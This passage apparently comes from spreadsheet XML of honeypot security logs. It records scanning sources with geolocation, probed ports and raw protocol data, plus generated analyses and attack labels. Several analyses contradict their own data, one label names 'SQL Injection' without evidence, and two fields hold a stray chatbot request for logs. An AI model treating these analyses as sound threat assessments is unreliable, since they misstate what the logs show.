    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3cfb:c26c"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="465"/>
    <x v="465"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T07:10:45"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-29T07:10:45"/>
    <n v="128"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_DNS_H36&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;53&amp;&amp;58868&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="Suzano"/>
    <s v="Suzano"/>
    <s v="3447212"/>
    <s v="NA"/>
    <s v="-23.5425"/>
    <s v="-46.3108"/>
    <s v="268051"/>
    <s v="NEXFIBRA TELECOMUNICACOES LTDA"/>
    <s v="Nexfibra Telecomunicacoes Ltda"/>
    <s v="business"/>
    <s v="Nexfibra Telecomunicacoes Ltda"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2da8:1457"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No suspicious activity detected, as Telnet connections are being ignored or blocked. This may be due to a security feature intentionally rejecting incoming Telnet traffic. &amp;&amp; Unknown connection attempt to a telnet service. No malicious activity detected as telnet data is unavailable. This could be a benign or failed login attempt. &amp;&amp; No log data provided, unable to analyze malicious activity."/>
    <s v="Telnet Scan"/>
  </r>
  <r>
    <x v="466"/>
    <x v="466"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T07:10:20"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-29T07:10:20"/>
    <n v="147"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SSH_H10&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_DNS_H16&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="22&amp;&amp;50355&amp;&amp;53&amp;&amp;27237&amp;&amp;NA&amp;&amp;23&amp;&amp;4645&amp;&amp;49430"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="São Bernardo do Campo"/>
    <s v="São Bernardo do Campo"/>
    <s v="3449344"/>
    <s v="NA"/>
    <s v="-23.6939"/>
    <s v="-46.565"/>
    <s v="266953"/>
    <s v="ARGO PROVEDOR DE INTERNET LTDA"/>
    <s v="Argo Provedor De Internet Ltda"/>
    <s v="business"/>
    <s v="Argo Provedor De Internet Ltda"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2de2:512"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="467"/>
    <x v="467"/>
    <s v="NA&amp;&amp;192-140-64-36.wtdtelecom-ba.com.br"/>
    <x v="0"/>
    <d v="2025-04-29T07:10:11"/>
    <d v="2023-12-06T05:58:00"/>
    <d v="2025-04-29T07:10:11"/>
    <n v="245"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_SMB_H25&amp;&amp;SMA-LAB_MSSQL_H46"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;NA&amp;&amp;445&amp;&amp;56037&amp;&amp;41951"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="BA"/>
    <s v="Bahia"/>
    <s v="Casa Nova Municipality"/>
    <s v="Casa Nova"/>
    <s v="3402621"/>
    <s v="NA"/>
    <s v="-9.17419"/>
    <s v="-40.9751"/>
    <s v="266550"/>
    <s v="WTD TELECOM"/>
    <s v="WTD TELECOM"/>
    <s v="business"/>
    <s v="WTD TELECOM"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,52273)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,57946)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,58093)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,53552)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,53735)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,62455)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,62634)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,52203)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,52589)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,54528)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,54675)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,61382)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,56954)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,57099)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,53169)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,53797)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,57369)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,57426)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,52117)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,52243)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,55942)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,56024)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,63242)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,63314)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,57669)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,57764)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,54927)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,55130)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,53609)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,53681)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,52721)}&amp;&amp;{Data_SMB:Incoming connection (192.140.64.36,60064)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c08c:4024"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="An incoming network connection to a shared resource has been detected from an unknown IP address suggesting potential unauthorized access attempts. The IP address and port number involved indicate the source of the connection. This may be related to a brute force attack or unauthorized data transfer. &amp;&amp; An incoming SMB connection from an unknown IP address suggests potential unauthorized access to shared resources. This could be an attempt to exploit vulnerabilities or exfiltrate sensitive information. The source IP is attempting to connect to a network service that may not be publicly exposed. &amp;&amp; An incoming connection from an unknown IP address to a shared resource is suspicious._x000a_This could be an attempt to access files or steal sensitive information without authorization._x000a_Possible malware or unauthorized user trying to breach system security. &amp;&amp; An incoming connection from an external IP address is attempting to access the system using SMB protocol, which could be a potential attempt at unauthorized file sharing or data exfiltration._x000a_This activity may indicate a malicious actor trying to exploit vulnerabilities in the system's file sharing capabilities._x000a_It could also be part of a larger attack to gain unauthorized access to sensitive information. &amp;&amp; There is insufficient information to analyze potential malicious activity. The absence of log data makes it impossible to identify or describe any possible malicious actions. &amp;&amp; An incoming connection is being made to a shared resource from an IP address that may be malicious. This could indicate an attempt to access or exploit the system's file sharing capabilities. Potential unauthorized access is occurring through SMB. &amp;&amp; This indicates an incoming connection from IP address 192.140.64.36 to the SMB service, which could be a sign of malicious activity attempting to access or exploit this service. The IP is attempting unauthorized access to shared resources. This may be part of a larger attempt to breach network security. &amp;&amp; No log data provided, cannot analyze activity._x000a__x000a_However, if you provide the actual log data I can assist with analyzing it for possible malicious activities."/>
    <s v="SMB Portscan &amp;&amp; SMB Scanning &amp;&amp; I don't see any log data provided to analyze. Please provide the actual log data, and I'll be happy to assist you with identifying the type of attack."/>
  </r>
  <r>
    <x v="468"/>
    <x v="468"/>
    <s v="prod56client01.academyforinternetresearch.org&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T06:20:07"/>
    <d v="2025-04-15T15:34:38"/>
    <d v="2025-04-29T06:20:07"/>
    <n v="85"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="high"/>
    <s v="SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="21&amp;&amp;23&amp;&amp;8443&amp;&amp;1433&amp;&amp;143&amp;&amp;110&amp;&amp;3306&amp;&amp;443&amp;&amp;3389&amp;&amp;25"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Shibuya"/>
    <s v="Shibuya"/>
    <s v="11808021"/>
    <s v="150-0000"/>
    <s v="35.6764"/>
    <s v="139.65"/>
    <s v="63949"/>
    <s v="Akamai Technologies, Inc."/>
    <s v="Akamai Technologies, Inc."/>
    <s v="hosting"/>
    <s v="Linode, LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;command&amp;&amp;GET&amp;&amp;login"/>
    <s v="{Data_FTP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTPS:{'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'A001'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTPS:{'Host': '103.211.202.140', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_HTTPS:{'Connection': 'close', 'Host': 'vm2448896.stark-industries.solutions', 'User-Agent': 'Mozilla/5.0 (Linux; Android 8; SM-G150NL; Build/OPM1.180203.72) AppleWebKit/537.36 (KHTML', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_IMAP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8ba2:77c4"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No malicious activity detected for TELNET service. No incoming or outgoing connections recorded. Service status remains unchanged. &amp;&amp; No FTP login attempt detected, but this may indicate an attempted brute-force attack to gain unauthorized access. The lack of any successful login attempts suggests the activity was likely malicious in nature. This could be part of a reconnaissance phase or probing for vulnerabilities. &amp;&amp; This suggests a failed attempt to access or connect to an RDP service, potentially malicious in nature as it may be an unauthorized login attempt. The fact that the connection was unsuccessful could mean the attacker's credentials were incorrect or the system blocked the attack. This activity indicates potential unauthorized access attempts. &amp;&amp; No activity detected for IMAP service, indicating possible absence of malicious connection attempts. _x000a_IMAP service remains inactive which may be indicative of no malicious probing or scanning. _x000a_This suggests the service is not being actively targeted by attackers at this time. &amp;&amp; No activity reported for Microsoft SQL Server. No login attempts or connections detected. Normal operation assumed if no events triggered by the system. &amp;&amp; The system detected an unknown or unexpected command being executed, possibly indicating malicious or automated activity. This could be related to exploiting a vulnerability or attempting unauthorized access. No valid command or function was recognized. &amp;&amp; Unknown service attempted to interact with PJL, which is an uncommon printer protocol suggesting potentially malicious activity. This may indicate a brute force attack or exploitation of a vulnerability. Interaction with this protocol is often indicative of malware or scanner behavior. &amp;&amp; Possible brute force attempt on POP3 service as &quot;Data&quot; is marked as unknown or unavailable which could indicate an invalid login attempt. Unknown credentials were used to try and access the service. Service may be targeted for password cracking. &amp;&amp; This log indicates an empty FTP command, which could be a reconnaissance attempt to identify available commands or services. It might also suggest a scanning activity trying to gather information about the system's vulnerabilities. This could potentially be a precursor to further malicious actions. &amp;&amp; This indicates an attempt to execute an FTP command without specifying any arguments or commands, which could be a reconnaissance probe or part of a larger malicious attack to scan the system for vulnerabilities. The lack of specific action suggests a preparatory phase or a scan to gather information. This behavior is unusual and potentially suspicious. &amp;&amp; Unknown activity detected for SMTP service, possibly due to lack of traffic or data. No specific malicious behavior is indicated by this log entry. Further investigation is required to determine the cause of this situation. &amp;&amp; The data indicates that a MySQL-related activity was detected, but it's unclear if it's legitimate or malicious due to lack of information. A potential scan or attempted access occurred. The specific details are unknown as no further information is provided. &amp;&amp; Attempted access to IMAP service, possibly for email account compromise or password cracking efforts."/>
    <s v="SQL Injection &amp;&amp; FTP Attack &amp;&amp; Telnet Scanning &amp;&amp; FTP Attack"/>
  </r>
  <r>
    <x v="469"/>
    <x v="469"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T06:15:10"/>
    <d v="2025-04-29T06:15:10"/>
    <d v="2025-04-29T06:15:10"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Ludhiana"/>
    <s v="Samrāla"/>
    <s v="1257503"/>
    <s v="NA"/>
    <s v="30.836"/>
    <s v="76.1932"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb7:92e4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No TELNET login attempt made. No malicious activity detected related to TELNET service access. Service not accessed or interacted with via TELNET connection. &amp;&amp; This data indicates an attempted connection to a Telnet service without any actual communication or activity, suggesting a probing or reconnaissance attempt by a malicious actor. The lack of further data suggests the attempt was likely unsuccessful or abandoned. This could be indicative of a scanning activity to identify potential vulnerabilities."/>
    <s v="Port Scan &amp;&amp; Telnet Scan"/>
  </r>
  <r>
    <x v="470"/>
    <x v="470"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T06:14:28"/>
    <d v="2025-04-17T00:08:34"/>
    <d v="2025-04-29T06:14:28"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d4:375d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="471"/>
    <x v="471"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T05:20:43"/>
    <d v="2025-04-29T05:20:43"/>
    <d v="2025-04-29T05:20:43"/>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d6:3fed"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="472"/>
    <x v="472"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T05:10:08"/>
    <d v="2023-09-01T14:09:00"/>
    <d v="2025-04-29T05:10:08"/>
    <n v="894"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_MYSQL_H29&amp;&amp;SMA-LAB_FTP_H9&amp;&amp;SMA-LAB_MYSQL_H16&amp;&amp;SMA-LAB_FTP_H22&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_FTP_H45&amp;&amp;SMA-LAB_SOCKS5_H45&amp;&amp;SMA-LAB_FTP_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;21&amp;&amp;443&amp;&amp;8443&amp;&amp;1080&amp;&amp;NA&amp;&amp;37628&amp;&amp;6379&amp;&amp;445&amp;&amp;40380&amp;&amp;5432&amp;&amp;49874&amp;&amp;44704&amp;&amp;23&amp;&amp;389&amp;&amp;6667&amp;&amp;47467"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="NA"/>
    <s v="Bangkok"/>
    <s v="1609350"/>
    <s v="10700"/>
    <s v="13.7563"/>
    <s v="100.502"/>
    <s v="135377"/>
    <s v="UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED"/>
    <s v="UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED"/>
    <s v="hosting"/>
    <s v="UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="command&amp;&amp;NA&amp;&amp;connection&amp;&amp;request"/>
    <s v="NA&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SMB:Incoming connection (165.154.120.30,58254)}&amp;&amp;{Data_SMB:Incoming connection (165.154.120.30,46700)}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=165.154.120.30;rport=60391'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=165.154.120.30;rport=59650'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=165.154.120.30;rport=41848'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=165.154.120.30;rport=51909'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_SOCKS5:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a59a:781e"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data provided, cannot analyze any activity. &amp;&amp; No data provided for analysis. &amp;&amp; Potential malicious activity detected involving a failed attempt to utilize SOCKS5 protocol for unauthorized access._x000a__x000a_This may indicate an attacker trying to bypass security measures using proxy servers, but was unable to connect._x000a__x000a_The presence of 'NA' suggests that the SOCKS5 connection attempt failed or was not completed. &amp;&amp; No log data provided, unable to analyze activity."/>
    <m/>
  </r>
  <r>
    <x v="473"/>
    <x v="473"/>
    <s v="NA"/>
